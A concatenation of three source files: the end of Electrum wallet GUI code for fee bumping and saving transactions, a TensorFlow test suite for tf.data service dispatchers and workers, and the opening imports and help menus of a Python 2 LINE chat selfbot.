BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
data_service_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.experimental.ops import grouping
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.platform import test
def _address_from_target(target):
# Targets are in the format <protocol>://<address>
return target.split("://")[1]
def _make_distributed_dataset(dataset,
dispatcher,
job_name=None,
max_outstanding_requests=None):
return dataset.apply(
data_service_ops._distribute(
"parallel_epochs",
dispatcher.target,
job_name=job_name,
max_outstanding_requests=max_outstanding_requests,
task_refresh_interval_hint_ms=20))
def _all_cluster_configurations():
with_work_dir = combinations.combine(
work_dir=None, fault_tolerant_mode=[True, False])
without_work_dir = combinations.combine(
work_dir="", fault_tolerant_mode=False)
return with_work_dir + without_work_dir
def _make_distributed_range_dataset(num_elements,
dispatcher,
job_name=None,
max_outstanding_requests=None):
"""Creates a distributed dataset.
Args:
num_elements: The number of elements in the range dataset that will be
distributed.
dispatcher: The dispatcher to distribute to.
job_name: Optional job name for the distributed dataset.
max_outstanding_requests: Optional limit on the number of outstanding
requests.
Returns:
The created dataset.
"""
dataset = dataset_ops.Dataset.range(num_elements)
return _make_distributed_dataset(dataset, dispatcher, job_name,
max_outstanding_requests)
class DataServiceOpsTest(test_base.DatasetTestBase, parameterized.TestCase):
def start_dispatch_server(self,
name="",
port=0,
work_dir=None,
fault_tolerant_mode=True,
job_gc_check_interval_ms=None,
job_gc_timeout_ms=None):
# If a test starts multiple independent dispatch servers, it should give
# them different `name` values.
work_dir = os.path.join(self.get_temp_dir(), "work_dir_",
name) if work_dir is None else work_dir
return server_lib.DispatchServer(
server_lib.DispatcherConfig(
port=port,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode,
job_gc_check_interval_ms=job_gc_check_interval_ms,
job_gc_timeout_ms=job_gc_timeout_ms))
def start_worker_server(self, dispatcher, port=0):
return server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=_address_from_target(dispatcher.target),
port=port,
heartbeat_interval_ms=200))
def restart_dispatcher(self, dispatcher):
"""Stops `dispatcher` and returns a new dispatcher with the same port."""
port = int(_address_from_target(dispatcher.target).split(":")[1])
dispatcher._stop()
return self.start_dispatch_server(
port=port,
work_dir=dispatcher._config.work_dir,
fault_tolerant_mode=dispatcher._config.fault_tolerant_mode)
def restart_worker(self, worker, dispatcher, use_same_port=True):
"""Stops `worker` and returns a new worker."""
port = 0
if use_same_port:
port = int(worker._address.split(":")[1])
worker._stop()
return self.start_worker_server(dispatcher, port)
def start_cluster(self,
num_workers,
name="",
work_dir=None,
fault_tolerant_mode=True):
"""Creates and starts a tf.data service cluster."""
dispatcher = self.start_dispatch_server(
name=name, work_dir=work_dir, fault_tolerant_mode=fault_tolerant_mode)
workers = [self.start_worker_server(dispatcher) for _ in range(num_workers)]
return dispatcher, workers
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
_all_cluster_configurations()))
def testDistributeBasic(self, work_dir, fault_tolerant_mode):
dispatcher, workers = self.start_cluster( # to avoid gcing workers, pylint: disable=unused-variable
1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode)
num_elements = 10
ds = _make_distributed_range_dataset(10, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherStop(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
results.append(next(iterator).numpy())
dispatcher._stop()
# After the dispatcher dies, the worker should continue providing the rest
# of the dataset's elements.
for _ in range(num_elements - 1):
results.append(next(iterator).numpy())
self.assertEqual(results, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBeforeReading(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
dispatcher = self.restart_dispatcher(dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringReading(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
dispatcher = self.restart_dispatcher(dispatcher)
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBetweenIterations(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(100, dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
dispatcher = self.restart_dispatcher(dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherManyRestarts(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements_start = 10
num_elements_end = 15
datasets = []
for num_elements in range(num_elements_start, num_elements_end):
datasets.append(_make_distributed_range_dataset(num_elements, dispatcher))
dispatcher = self.restart_dispatcher(dispatcher)
for ds, num_elements in zip(datasets,
range(num_elements_start, num_elements_end)):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndWorkerRestart(self):
dispatcher, [worker] = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = dataset_ops.Dataset.range(num_elements)
def restart():
return (self.restart_dispatcher(dispatcher),
self.restart_worker(worker, dispatcher))
ds = _make_distributed_dataset(ds, dispatcher)
dispatcher, worker = restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
dispatcher, worker = restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeSparse(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
element = sparse_tensor.SparseTensor(
indices=[[0]],
values=constant_op.constant([0], dtype=dtypes.int32),
dense_shape=[1])
ds = dataset_ops.Dataset.from_tensors(element)
ds = _make_distributed_dataset(ds, dispatcher)
results = [sparse_ops.sparse_tensor_to_dense(elem) for elem in ds]
self.assertAllEqual(results, [[0]])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeRagged(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.from_tensor_slices([1, 5, 3, 2, 8])
ds = ds.map(math_ops.range)
ds = ds.apply(batching.dense_to_ragged_batch(2))
ds = _make_distributed_dataset(ds, dispatcher)
results = [elem.to_tensor() for elem in ds]
self.assertAllEqual(results[0], [[0, 0, 0, 0, 0], [0, 1, 2, 3, 4]])
self.assertAllEqual(results[1], [[0, 1, 2], [0, 1, 0]])
self.assertAllEqual(results[2], [[0, 1, 2, 3, 4, 5, 6, 7]])
@combinations.generate(test_base.eager_only_combinations())
def testDifferentShuffleOrders(self):
random_seed.set_random_seed(None)
num_elements = 100
dispatcher, workers = self.start_cluster(2) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements)
ds = _make_distributed_dataset(ds, dispatcher)
output = [elem.numpy() for elem in ds]
# The output will be two sequences of range(num_elements)
# non-deterministically interleaved together. If the orders of the elements
# were the same, first_order and second_order computed below will be equal.
first_order = {}
second_order = {}
for element in output:
if element in first_order:
second_order[element] = len(second_order)
else:
first_order[element] = len(first_order)
self.assertNotEqual(first_order, second_order)
@combinations.generate(test_base.eager_only_combinations())
def testMultipleEpochs(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 3
ds = _make_distributed_range_dataset(num_elements, dispatcher)
for _ in range(10):
self.assertEqual(list(range(num_elements)), [elem.numpy() for elem in ds])
@combinations.generate(test_base.eager_only_combinations())
def testRepeatedDataset(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_repetitions = 5
ds = _make_distributed_range_dataset(num_elements, dispatcher)
ds = ds.repeat(num_repetitions)
self.assertDatasetProduces(
ds, expected_output=num_repetitions * list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testConcurrentEpoch(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_datasets = 3
iterators = []
results = []
for _ in range(num_datasets):
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterators.append(iter(ds))
results.append([])
for _ in range(num_elements):
for dataset_ind in range(num_datasets):
result = next(iterators[dataset_ind]).numpy()
results[dataset_ind].append(result)
for result in results:
self.assertEqual(list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testSharedEpoch(self):
self.skipTest("Not yet implemented")
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_iterators = 3
ds = _make_distributed_range_dataset(num_elements, dispatcher)
result = []
iterators = []
for _ in range(num_iterators):
iterators.append(iter(ds))
# Alternate reading between the iterators.
for _ in range(2):
for it in iterators:
result.append(next(it).numpy())
# Drain the rest of the elements.
for it in iterators:
for elem in it:
result.append(elem.numpy())
self.assertCountEqual(list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testMultiWorker(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(num_elements, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertCountEqual(num_workers * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testStartServersLate(self):
# Test that the data service client performs retries instead of failing when
# the dataset is created before the master and worker are started.
try:
import portpicker # pylint: disable=g-import-not-at-top
dispatcher_port = portpicker.pick_unused_port()
except:
raise self.skipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
dispatcher = server_lib.DispatchServer(
server_lib.DispatcherConfig(port=dispatcher_port), start=False)
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=_address_from_target(dispatcher.target), port=0),
start=False)
def start_servers():
time.sleep(1)
dispatcher.start()
worker.start()
start_servers_thread = threading.Thread(target=start_servers, daemon=True)
start_servers_thread.start()
num_elements = 10
ds = _make_distributed_range_dataset(num_elements, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
start_servers_thread.join()
@combinations.generate(test_base.eager_only_combinations())
def testAddWorkerMidJob(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
# Read halfway through the dataset.
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
new_worker = self.start_worker_server(dispatcher) # to avoid gcing workers, pylint: disable=unused-variable
# Wait for the new worker to register with the dispatcher.
while dispatcher._num_workers() < 2:
time.sleep(10 / 1000) # 10ms
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(2 * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(use_same_port=[True, False]),
_all_cluster_configurations()))
def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
dispatcher, [worker] = self.start_cluster(
1, work_dir=work_dir, fault_tolerant_mode=fault_tolerant_mode)
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
# Read halfway through the dataset.
midpoint = num_elements // 2
for i in range(midpoint):
self.assertEqual(i, next(iterator).numpy())
# Stop the original worker and start a new one.
worker = self.restart_worker(worker, dispatcher, use_same_port)
# There may have been some elements prefetched from the first worker
# before it was stopped.
while True:
val = next(iterator).numpy()
if val == 0:
break
# The dataset starts over now that we read from the new worker.
# TODO(b/157086991): Iterate until end of sequence when we support
# detecting lost workers.
for i in range(1, num_elements // 2):
val = next(iterator).numpy()
self.assertEqual(i, val)
@combinations.generate(test_base.eager_only_combinations())
def testMaxOutstandingRequests(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(
num_elements, dispatcher, max_outstanding_requests=1)
self.assertCountEqual(num_workers * list(range(num_elements)),
self.getDatasetOutput(ds))
@combinations.generate(test_base.eager_only_combinations())
def testInsideFunction(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
@def_function.function
def f():
ds = _make_distributed_range_dataset(num_elements, dispatcher)
result = tensor_array_ops.TensorArray(
dtypes.int64, size=num_workers * num_elements, dynamic_size=True)
i = 0
for elem in ds:
result = result.write(i, elem)
i += 1
return result.stack()
result = list(f().numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobName(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
def make_ds():
return dataset_ops.Dataset.range(num_elements).shuffle(num_elements)
ds1 = _make_distributed_dataset(make_ds(), dispatcher, job_name="job_name")
ds2 = _make_distributed_dataset(make_ds(), dispatcher, job_name="job_name")
iter1 = iter(ds1)
iter2 = iter(ds2)
results = []
for _ in range(num_elements // 5):
results.append(next(iter1).numpy())
results.append(next(iter2).numpy())
for elem in iter1:
results.append(elem.numpy())
for elem in iter2:
results.append(elem.numpy())
self.assertCountEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDifferentJobNames(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name1")
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name2")
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultiIteration(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
# iteration 1
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, [])
# iteration 2
self.assertDatasetProduces(ds2, list(range(num_elements)))
self.assertDatasetProduces(ds1, [])
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameRepeat(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
num_repetitions = 3
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds1 = ds1.repeat(num_repetitions)
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds2 = ds2.repeat(num_repetitions)
results = []
iter1 = iter(ds1)
iter2 = iter(ds2)
for _ in range((num_elements * num_repetitions) // 5):
results.append(next(iter1).numpy())
for _ in range((num_elements * num_repetitions) // 5):
results.append(next(iter2).numpy())
for elem in iter1:
results.append(elem.numpy())
for elem in iter2:
results.append(elem.numpy())
self.assertCountEqual(num_repetitions * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(job_name=[None, "test"])))
def testGcUnusedJob(self, job_name):
dispatcher = self.start_dispatch_server(
job_gc_check_interval_ms=50, job_gc_timeout_ms=20)
worker = self.start_worker_server(dispatcher) # pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(
num_elements, dispatcher, job_name=job_name)
it = iter(ds)
self.assertEqual(0, next(it).numpy())
self.assertEqual(1, worker._num_tasks())
del it
while worker._num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcUsedJob(self):
dispatcher = self.start_dispatch_server(
job_gc_check_interval_ms=50, job_gc_timeout_ms=20)
worker = self.start_worker_server(dispatcher) # pylint: disable=unused-variable
num_elements = 10
it1 = iter(
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test1"))
it2 = iter(
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test2"))
it3 = iter( # this iterator keeps the task alive. pylint: disable=unused-variable
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test2"))
self.assertEqual(2, worker._num_tasks())
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because there is still an outstanding iterator for it.
while worker._num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(1, worker._num_tasks())
@combinations.generate(test_base.eager_only_combinations())
def testApplyDeterminismOption(self):
elements = list(range(10))
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
def dataset_fn(delay_ms):
def interleave_fn(x):
ds = dataset_ops.Dataset.from_tensors(x)
if math_ops.equal(x, 0):
ds = ds.apply(testing.sleep(delay_ms * 1000))
else:
ds = ds.apply(testing.sleep(0))
return ds
ds = dataset_ops.Dataset.from_tensor_slices(elements)
ds = ds.interleave(interleave_fn, cycle_length=10, num_parallel_calls=10)
opts = dataset_ops.Options()
opts.experimental_deterministic = False
ds = ds.with_options(opts)
ds = _make_distributed_dataset(ds, dispatcher)
return ds
self.checkDeterminism(
dataset_fn=dataset_fn,
expect_determinism=False,
expected_elements=elements)
def run_stateful(self, external_state_policy):
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements).map(
lambda _: random_ops.random_uniform(()))
options = dataset_ops.Options()
options.experimental_external_state_policy = external_state_policy
ds = ds.with_options(options)
dispatcher, workers = self.start_cluster(3) # to avoid gcing workers, pylint: disable=unused-variable
ds = _make_distributed_dataset(ds, dispatcher)
next(iter(ds))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(external_state_policy=[
distribute_options.ExternalStatePolicy.IGNORE,
distribute_options.ExternalStatePolicy.WARN
])))
def testStatefulNoError(self, external_state_policy):
self.run_stateful(external_state_policy)
@combinations.generate(test_base.eager_only_combinations())
def testStatefulError(self):
with self.assertRaises(errors.FailedPreconditionError):
self.run_stateful(distribute_options.ExternalStatePolicy.FAIL)
@combinations.generate(test_base.eager_only_combinations())
def testDistributeFromInterleave(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.range(2)
def interleave_fn(_):
dataset = dataset_ops.Dataset.range(2)
_make_distributed_dataset(dataset, dispatcher)
return dataset
ds = ds.interleave(interleave_fn, cycle_length=2)
self.assertDatasetProduces(ds, [0, 0, 1, 1])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeNonStringAddresses(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError, "service must be a string"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=1))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeEmptyAddress(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesWithLiteralMatch(ValueError,
"service must not be empty"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=""))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeInvalidProcessingMode(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError,
"invalid is not a valid processing mode"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="invalid", service="grpc://localhost:5000"))
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetId(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, ds.element_spec)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdMultipleComponents(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds = dataset_ops.Dataset.zip({"a": (ds, ds), "b": ds})
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, ds.element_spec)
output = self.getDatasetOutput(from_dataset_id_ds)
for i in range(num_elements):
self.assertEqual(i, output[i]["a"][0])
self.assertEqual(i, output[i]["a"][1])
self.assertEqual(i, output[i]["b"])
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdWrongElementSpec(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
wrong_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, wrong_spec)
with self.assertRaisesRegex(errors.FailedPreconditionError,
"Expected a tensor of type variant"):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdNotRegistered(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
dataset_id = 0
element_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, element_spec)
with self.assertRaisesRegex(errors.NotFoundError, "Dataset id"):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testCancellation(self):
self.skipTest("b/162521601")
sleep_microseconds = int(1e6) * 1000
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
# Create a dataset which produces the first element quickly, and the second
# element slowly. Fetching the first element triggers prefetching of the
# second element, which we should be able to cancel.
slow = dataset_ops.Dataset.range(1)
slow = slow.apply(testing.sleep(sleep_microseconds))
ds = dataset_ops.Dataset.range(1).concatenate(slow)
ds = _make_distributed_dataset(ds, dispatcher)
ds = ds.prefetch(1)
get_next = self.getNext(ds, requires_initialization=True)
self.assertEqual(0, self.evaluate(get_next()))
# Without properly implemented cancellation, we will hang here while trying
# to garbage collect the dataset iterator.
@combinations.generate(test_base.eager_only_combinations())
def testRegisterEquivalentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(10)
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
id_1 = data_service_ops.register_dataset(dispatcher.target, ds_1)
id_2 = data_service_ops.register_dataset(dispatcher.target, ds_2)
self.assertEqual(id_1.numpy(), id_2.numpy())
@combinations.generate(test_base.eager_only_combinations())
def testRegisterDifferentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(20)
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
id_1 = data_service_ops.register_dataset(dispatcher.target, ds_1)
id_2 = data_service_ops.register_dataset(dispatcher.target, ds_2)
self.assertNotEqual(id_1.numpy(), id_2.numpy())
@combinations.generate(test_base.eager_only_combinations())
def testTwoLevelDistribute(self):
cluster_1_size = 3
dispatcher_1, workers_1 = self.start_cluster( # to avoid gcing workers, pylint: disable=unused-variable
cluster_1_size,
name="cluster_1")
dispatcher_2, workers_2 = self.start_cluster(1, name="cluster_2") # to avoid gcing workers, pylint: disable=unused-variable
num_sizes = 10
size_repeats = 5
strings = ["a" * i for i in range(num_sizes)] * size_repeats
ds = dataset_ops.Dataset.from_tensor_slices(strings)
ds = ds.shuffle(len(strings))
ds = _make_distributed_dataset(ds, dispatcher_1)
# Large enough so that all strings of the same size are windowed together.
window_size = cluster_1_size * size_repeats
batch_size = size_repeats
def key_func(x):
return math_ops.cast(string_ops.string_length_v2(x), dtypes.int64)
ds = ds.apply(
grouping.group_by_window(
key_func=key_func,
reduce_func=lambda _, x: x.batch(batch_size),
window_size=window_size))
ds = _make_distributed_dataset(ds, dispatcher_2)
it = iter(ds)
for _ in range(num_sizes):
element = next(it).numpy()
for _ in range(1, cluster_1_size):
self.assertAllEqual(next(it).numpy(), element)
self.assertEmpty(list(it))
if __name__ == "__main__":
test.main()
|
puyself.py
|
# -*- coding: utf-8 -*-
import PUY
from PUY.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
#JANGAN LUPA => sudo pip install bs4 => sudo pip install BeautifulSoup => sudo pip install urllib
cl = PUY.LINE()
cl.login(qr=True)
cl.loginResult()
print "\n[CIE BERHASIL LOGIN]"
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""╠═════════════════
╠-> google (text)
╠-> playstore (text)
╠-> instagram (username)
╠-> wikipedia (text)
╠-> idline (text)
╠-> time
╠-> image (text)
╠-> runtime
╠-> Restart
╠-> lirik (text)
╠-> Mention
╠-> Lurk on/off
╠-> Lurkers
╠-> protect on/off
╠-> qr on/off
╠-> invite on/off
╠-> Cancel on/off
╠-> Simisimi:on/off
╠-> Read on/off
╠-> Getinfo @
╠-> Getcontact @
╠-> ulti @
╠-> speed
╠-> Friendlist
╠-> id@en
╠-> en@id
╠-> id@jp\n 「OR」\n╠-> helppro\n╠-> helpself\n╠-> helpset\n╠-> helpgrup\n╠-> helptranslate
╚═════════════════"""
helppro ="""
╠═════════════════
╠➩ protect on/off
╠➩ qr on/off
╠➩ invite on/off
╠➩ cancel on/off
╚═════════════════"""
helpself ="""
╠═════════════════
╠➩Me
╠➩Myname:
╠➩Mybio:
╠➩Mypict
╠➩Mycover
╠➩My copy @
╠➩My backup
╠➩Getgroup image
╠➩Getmid @
╠➩Getprofile @
╠➩Getinfo @
╠➩Getname @
╠➩Getbio @
╠➩Getpict @
╠➩Getcover @
╠➩Mention
╠➩setpoint on/off
╠➩viewlastseen
╠➩Micadd @
╠➩Micdel @
╚═════════════════"""
helpset ="""
╠═════════════════
╠->contact on/off
╠->autojoin on/off
╠->auto leave on/off
╠->autoadd on/off
╠->like friend
╠->link on
╠->respon on/off
╠->read on/off
╠->simisimi on/off
╚═════════════════"""
helpgrup ="""
╠═════════════════
╠->Link on
╠->Url
╠->Cancel
╠->Gcreator
╠->Kick @
╠->Ulti @
╠->Gname:
